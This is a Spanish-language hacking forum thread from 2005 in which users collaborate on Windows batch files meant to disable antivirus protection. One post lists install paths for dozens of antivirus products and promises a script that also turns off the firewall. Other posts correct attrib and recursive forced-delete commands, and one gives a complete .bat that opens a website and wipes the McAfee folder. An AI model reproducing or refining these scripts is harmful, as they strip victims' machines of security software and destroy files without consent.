charly fran
Visitante
|
 |
« Respuesta #75 en: Junio 21, 2005, 06:32:18 » |
|
entonces qeuda haci del /q /s /f *.*C:\Archivos de Programa\Panda Software\Panda Antivirus 6.0 attrib -a -r -h *.* y el otro antivuus y haci sucesibamente
|
|
|
|
|
|
|
|
|
|
|
Dirpok
Miembro

|
 |
« Respuesta #77 en: Junio 22, 2005, 12:05:30 » |
|
Hola, soy nuevo aki y me gustaria aportar un poco en este maravilloso foro, observe que casi se dedican a borrar el norton, panda, y otros que son usados, bueno mi manera de ayudarles con esto de borrar los antivirus es darle las direcciones de instalacion de algunos, espero que les sirva y pronto voy a poner un .bat que estoy creandome para borrar los antivirus que menciono en la lista y tambien la funcion de desactivar el firewall, Todo esto es sacado de los foros de
* el-hacker.com * el-hacker.net
NORTON ANTIVIRUS 2004, 2003: c:\archivos de programa\Norton Anitvirus
NORTON 2004: C:\Archivos de programa\Norton SystemWorks\Norton Antivirus
ADNM avast! managment tools: C:\Archivos de programa\Alwil Software\Management Tools
XoftSpy: C:\Archivos de programa\XoftSpy\
Pc-cillin 2002: C:\Archivos de programa\Trend Micro\PC-cillin 2002\
F-prot1 c:\f-prot
AVG v6 C:\Archivos de programa\Grisoft\AVG6
AVG v7 free C:\Archivos de programa\Grisoft\AVG Free
McAfee8 C:\Archivos de programa\McAfee\McAfee Shared Components C:\Archivos de programa\McAfee.com\Agent C:\Archivos de programa\McAfee.com
McAfee7.0.0 C:\Archivos de programa\Network Associates\VirusScan\
McAfee 4.5.1 C:\Archivos de programa\Network Associates\VirusScan\
BitDefender profv6.5 C:\Archivos de programa\SOFTWIN\BDProf
PANDA 6.0 c:\pavp C:\Archivos de Programa\Panda Software\Panda Antivirus 6.0
PANDA PLATINUM C:\Archivos de programa\Panda Software\Panda Antivirus Platinum
C:\Program Files\AntiViral Toolkit Pro C:\eSafe\Protect C:\Program Files\Command Software\F-PROT95 C:\PC-Cillin 95 C:\PC-Cillin 97 C:\Program Files\Quick Heal C:\Program Files\FWIN32 C:\Program Files\FindVirus C:\Toolkit\FindVirus C:\f-macro C:\Program Files\McAfee\VirusScan95 C:\Program Files\Norton Antivirus C:\TBAVW95 C:\VS95[/b]
bueno, yo tengo el Kaspersky y me va de maravilla, pero este no es el tema!! Os digo la ruta del Kaspersky: C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro y me parece k por el kaspersky personal es lo mismo pero sin Pro!
|
|
|
|
|
|
|
|
|
----milhause----
Visitante
|
 |
« Respuesta #78 en: Julio 12, 2005, 07:10:18 » |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Saok
Gran Colaborador

Saok siempre esta ahi...
|
 |
« Respuesta #81 en: Agosto 13, 2005, 02:58:55 » |
|
ola ninguna esta bien.... mejor la segunda,pero corrige esto: cd "Norton Anitvirus"
*norton* y esto tamben: attrib *.* -a -h -r mejor asi attrib *.* -a -h -r saludos
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Saok
Gran Colaborador

Saok siempre esta ahi...
|
 |
« Respuesta #87 en: Agosto 15, 2005, 08:02:32 » |
|
ola vamos aver.....la direcion(da lo mismo pero mejor asi)en minusculas para k no se lie....luego corrige esta parte: c:\archivos de programa\Norton Anitvirus
asi: cd\ cd "archivos de programa" cd *norton*-->y antes k me digas,pork no t metes en la carpeta(es lo mas komun k digan eso)pork el /s de "del" elimina todo en los subdirectorios.... com respecto a tu pregunta.......no se si lo e pillado bien....pero k vayan apareciendo las letras no puedes acer k aparezca todo a la vez,pero letra por letra no(por lo menos en el mismo editor) espero k porfin consigas acabarlo saludos
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Rasengan
Visitante
|
 |
« Respuesta #92 en: Octubre 19, 2005, 09:54:27 » |
|
echadle un vistaxo a este bat aver que tal esta @echo off START HTTP://WWW.TONTERIAS.COMcd\ cd archivos de programa cd McAfee.com attrib -s-a-r-h *.* del/S/Q *.* que os parece?
|
|
|
|
|
|
|
|
|
darknessfeatsunny
Visitante
|
 |
« Respuesta #93 en: Octubre 19, 2005, 10:42:01 » |
|
|
|
|
|
|
|
|
|
|
Rasengan
Visitante
|
 |
« Respuesta #94 en: Octubre 19, 2005, 01:40:21 » |
|
|
|
|
|
|
|
|
|
|
|
|
darknessfeatsunny
Visitante
|
 |
« Respuesta #96 en: Octubre 19, 2005, 02:00:21 » |
|
mirate la ayuda de microsoft como te dijo el amigo dade y si tienes dudas postealas...aqi las resolvemos...
|
|
|
|
|
|
|
|
|
|
|
|